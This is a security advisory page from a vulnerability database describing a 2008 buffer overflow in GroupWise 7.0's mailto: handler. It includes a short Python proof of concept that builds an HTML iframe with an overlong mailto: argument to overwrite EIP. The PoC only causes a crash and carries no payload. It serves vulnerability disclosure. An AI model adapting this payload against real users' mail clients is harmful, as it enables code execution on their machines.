Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19741
HistoryApr 28, 2008 - 12:00 a.m.

GroupWise 7.0 mailto: scheme buffer overflow

2008-04-2800:00:00
vulners.com
16
JSON

PRODUCT: GroupWise 7.0
OS: Windows Xp

The scheme "mailto" is vulnerable if one takes as default mail client to GroupWise, the fault is to
implement the scheme followed by an extensive argument and this causes the buffer overflow. This
brings the consequence that can overwrite the EIP and is able to execute arbitrary code. The result
with a debbuger us what reveals.

Access violation when executing [41414141]

What power is that vulnerability to attach a html file which is included in an iframe with the scheme
badly formed runs only watch.

proof of concept

#!/usr/bin/python

a = "<iframe src='mailto:"
a += "A" * 1530
a += "\x61\x61\x61\x61"
a += "' width='320' height='300' scrolling='yes' name='content'></iframe>"

file = open("test.html", "w")
file.write(a)
file.close()

greetings!

Juan Pablo Lopez Yacubian

JSON